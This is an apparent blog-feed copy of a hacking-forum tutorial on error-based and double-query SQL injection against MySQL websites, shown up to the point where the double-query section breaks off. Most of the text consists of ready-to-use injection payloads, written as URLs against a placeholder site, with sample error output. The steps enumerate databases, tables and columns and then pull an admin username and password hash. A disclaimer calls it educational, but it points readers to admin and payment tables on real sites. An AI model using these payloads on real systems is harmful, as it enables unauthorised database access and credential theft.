tag:blogger.com,1999:blog-32656625060157561782024-03-05T06:01:57.653-08:00Web,Security,ExploitsBlog on Information & Network Security | Sharing is Caring | Search,Learn,Share |Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.comBlogger31125tag:blogger.com,1999:blog-3265662506015756178.post-20203658634419824292013-09-04T23:06:00.001-07:002013-09-04T23:06:15.284-07:00[TUT]SQL Injection - Error Based and Double Query<div dir="ltr" style="text-align: left;" trbidi="on">
<div align="center" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">
[TUT]SQL Injection - Error Based and Double Query.<br /><br />Hello, Nueral-Security members.<br /><br /><span class="bbc_color" style="color: red;">This tutorial is purely for educational purposes!<br />Any misuse of my tutorials is at own risk!</span><br /><br />We will need a few things for this tutorial.<br />Its a lot more complicated then my last 2 tutorials.</div>
<br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">1. Firefox </span><a class="bbc_link" href="http://www.mozilla.org/en-US/firefox/new/" style="background-color: #282828; color: cornflowerblue; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px; text-decoration: none;" target="_blank">Download latest version of Firefox</a><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;"> </span><span class="bbc_size" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 8pt; line-height: 1.4em;">(For hackbar add-on)</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">2. Hackbar </span><a class="bbc_link" href="https://addons.mozilla.org/nl/firefox/addon/hackbar/" style="background-color: #282828; color: cornflowerblue; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px; text-decoration: none;" target="_blank">Install hackbar on FireFox</a><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;"> </span><span class="bbc_size" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 8pt; line-height: 1.4em;">(To easily adapt complex attack vectors).</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">3. Any text editor. </span><span class="bbc_size" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 8pt; line-height: 1.4em;">(To paste the database information).</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><br />
<div align="center" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">
<br />First of all i would like to explain what error based SQL injection is.<br />And then explain the difference between error based and Double Query SQL Injection.<br /><br /><br />Error based:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">By injecting a specific query, i will show you this later in the tutorial. We get an error message returning in the page.<br />This msg actually gives us sensitive database information. That's why we call this error based SQL injection.</span><br /><br />Double Query:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Works exactly the same as error based injection but, the Error Based Query will be doubled as a single query statement.<br />So that we again successfully get an error message.</span><br /><br />Now, that was a short explanation of error and double query based SQL Injection i made here!<br />This should give you a basic idea of what we are dealing with!<br /><br />Let's get started!<br /><br /><span class="bbc_color" style="color: green;">Determine when we should use error or double query Injection.</span><br /><br />When you did order by and got the column count <you can learn this method in my first tutorial>.<br />And, you switch over to union select statements the page then returns an error saying something like:<br /><br />Case 1:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">The Used Select Statements Have Different Number Of Columns.</code>Case 2:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Unknown column 1;</code>Case 3:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Nothing returns at all. And you can't find the columns on the web content.<br />Then you can also use error based Injection.</code><br />These are the most common cases when we can use error based and double Query Injection.<br />Now that we know when to use this and you have a page whit a case like that let's move on!<br /><br /><span class="bbc_color" style="color: green;">Using Error based injection.</span><br /></div>
<span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">1. Get the MySQL Version.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">2. Get the Database Name.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">3. Get the Table Names.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">4. Get the Column Names.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">5. Extracting Information from the Columns.</span><br />
<div align="center" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">
<br /><br /><span class="bbc_color" style="color: orange;">Get the MySQL Version.</span><br /><br />The query to get the MySQL version for error based injection is:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--</code><br />What does this line of code actually say?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We need to group by concat_ws because this concat allows us to inject more then one statement at a time.<br />In this case injecting a colon(ox3a) and the version. All the other stuff is to actually retrieve info in our error msg.</span><br /><br />Returned error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'5.1.41'~1' for key 1</code>This means this Web Page has MySQL version 5.1.41.<br /><br /><br /><span class="bbc_color" style="color: orange;">Get the Database Name.</span><br /><br />To get the database name it's already a little more complicated.<br />First of all there can be more then one database on a server. Ill explain how to find those as well!<br /><br />The Query to get database names:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br />Look closely at this query! Look for limit 0,1 This is how we find more databases inside a server.<br />If we edit 0,1 to 1,1 and keep increasing 2,1 and further until you don't see any changes any more.<br />That way you know you got all databases. Put those in a notepad you will need the first later on in this tutorial.<br /><br />What does this query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">In concat we can select more then on statement as i said before whit the version. This way we now select the database name using a method called cast.<br />You will be seeing more about cast as you advance in SQL Injection. We say we want to get the database (as char) in characters from information_schema which is the database.</span><br /><br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'Ignotus_1' for key 1</code>That means our database name is Ignotus_1.<br />When i increased the limit nothing changed meaning we have only one database.<br /><br />Write down that database name you will be needing that name.<br /><br /><br /><span class="bbc_color" style="color: orange;">Get the Table Names</span><br /><br />Now we are getting somewhere we need the more difficult stuff. Getting the table names.<br />Be sure to use the hackbar because it really eases you're stuff.<br /><br />The Query to get the Table names:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br />Yet again i use the limit function here. Only that way you can get all tables using error based injection.<br />By increasing that limit as previously explained you will find them all.<br /><br />As i said in my first tutorial always look for useful tables. Admin tables, members tables, user anything to do whit user credentials is interesting.<br />For black hats probs shop tables or payments sections are interesting as well but i don't want to support black hatting!<br /><br />What does this extremely large Query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Using the select in the concat method again and whit casting table_name as characters we ask the table name from the information_schema (database).<br />Thats the easyest explenation i can possebly give.</span><br /><br />For limit 0,1:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'tbl_news' for key 1</code>For limit 1,1:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'tbl_gallery' for key 1</code>For limit 2,1:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'tbl_userAdmins' for key 1</code><br />Finally something usefull: <span class="bbc_color" style="color: red;">tbl_userAdmins</span>.<br />Now that we have ourselves an interesting table we want to extract information out of it.<br /><br /><br /><span class="bbc_color" style="color: orange;">Get the Column Names</span><br /><br />Yet another step further this won't get more easy. And this is still regular error based people.<br />SQL Injection is hard you need your brains!<br /><br />The Query to extract the column names from tables:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code>It is important to look at this code where it said TABLENAMEHERE we need to put our table in hex.Be sure that 0x is in front so the MySQL server knows what it is.<br />In the hackbar go over to encoding there choose encode in hex first format. Or go to the next site and put the table name on where is sais "Say hello to my little friend" <a class="bbc_link" href="http://www.swingnote.com/tools/texttohex.php" style="color: cornflowerblue; text-decoration: none;" target="_blank">http://www.swingnote.com/tools/texttohex.php</a>. There is also a limit behind our hex.<br />We are going to need this limit to successfully extract all columns.<br /><br />In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br />Now what does our Query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We select the column_name using cast and want it to return in characters using as char, from the database but this time also from the table.<br />The one we put there in hex. And whit a limit to get all the different columns in there.</span><br /><br />Now my first error is:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'admin_NAME' for key 1</code><br />That will get us the admin name we need. If you haven’t got that just increase the limit.<br />Now i need my next column i need the passwords of course. For sake of simplicity that’s my next one.<br /><br />Error code:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'admin_PWD' for key 1</code>Now we finally get on to the fun part where we get our admin / PWD!!<br /><br /><span class="bbc_color" style="color: orange;">Extracting Information from the Columns.</span><br /><br />Every one likes this part! The part where we finally get to something!<br />Any ways i have to tell you this is only half of the tutorial. We only covered error based. Double Query is beyond this part.<br /><br /><br />(Beware where it said <span class="bbc_color" style="color: green;">admin_Name</span> and <span class="bbc_color" style="color: green;">admin_PWD</span> you have to replace whit the username and password column you extracted before!<br />Also where it says <span class="bbc_color" style="color: cyan;">tbl_userAdmins</span> put your table name where you extracted the columns from.<br />Almost forgotten the database name did ya?? Well this is where you need it. Where it said <span class="bbc_color" style="color: orange;">Ignotus_1</span> there is where you put the database name.)[/size]<br />Our Query to extract information:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br />What does this Query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We select using the concat and cast (selecting admin_NAME 0x7e (colon) to put admin name and admin_PWD together in our error message.<br />As char (in characters) from the database (Ignotus_1) of the table: tbl_userADMINS.</span><br /><br />Our error MSG:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'uSploit~4c0e8eb3ed67f58dc56e724e5297a598~1' for key 1</code><br />Congratulations you successfully injected a vulnerable to error based SQL Injection website. (mouth full)<br />Username: uSploit<br />Password: 4c0e8eb3ed67f58dc56e724e5297a598n <-- this is MD5 I won't teach you how to decrypt hashes.<br /><br /><span class="bbc_color" style="color: green;">Using Double Query Injection</span><br /></div>
<span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">*Short explanation*</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">1. Get the MySQL Version.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">2. Get the Database Name.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">3. Get the Table Names.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">4. Get the Column Names.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">5. Extracting Information from the Columns.</span><br />
<div align="center" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">
<br />Short explanation:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Now I haven’t been explaining this so well, i will take my time to make this clear to you.<br />This method is almost exact the same as error based but it uses 2 query's in one syntax.<br />This way it makes the database respond whit the things we ask.<br />You can see this as overloading someone whit so many information he has no other choice then to give the answer.</span><br /><br /><span class="bbc_color" style="color: orange;">Get the MySQL Version.</span><br /><br />Before you start you're way up to the end of this tutorial. Take a look at the Query below and one of error based injection.<br />There is a lot of difference in the query's don't mess em up.<br /><br />Our Query for the version! (Double Query):<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />Now what does this extremely large query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We yet again select multiple statements using the concat method and whit double query cast the version as characters .<br />We want this from information.schema (database) and we add and 1=1 at the end of our query to make it return true.</span><br /><br />Error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
